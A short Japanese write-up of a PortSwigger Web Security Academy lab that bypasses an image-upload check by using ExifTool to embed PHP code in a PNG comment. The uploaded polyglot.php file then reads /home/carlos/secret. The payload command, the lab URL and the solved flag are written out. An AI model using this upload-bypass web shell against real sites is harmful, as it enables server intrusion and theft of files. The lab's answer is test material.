Hello there, ('ω')ノ
polyglot webシェルアップロードによるリモートコード実行を。
まずは、ログインして。

いつもどおり悪意のあるPHPファイルをアップロードすると。

イメージファイルではないとのことで。

リピータで、ヌルバイトと拡張子を追加してSendしてみると。
同じく、イメージファイルではないとのことで。

とりあえず、ExifToolをダウンロードすることに。
これは、写真や画像やメディアファイルからメタデータを取得したり。
追加したり変更したりできるツールで。
https://exiftool.jp.uptodown.com/windows/download


解凍してあとは、名前をexiftoolにしておいて。
適当な画像ファイルにコメントとしてPHPファイルのコードを追加することに。
'START'と'END'は、位置を特定しやすくするために。
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" test.png -o polyglot.php

画像に悪意のコードを追加したPHPファイルをアップロードすると。

画像データとみなして拡張子が.phpでもアップロードできて。

アップロードした位置を確認して。

直接、URLにアクセスしてみると。
https://ac7d1f901ea31adac03944b300860092.web-security-academy.net/files/avatars/polyglot.php

取得したコードを入力すると、クリアできて。
mVe9eMTpecNDL0yPbiege4ef5eeVzjLt

Best regards, (^^ゞ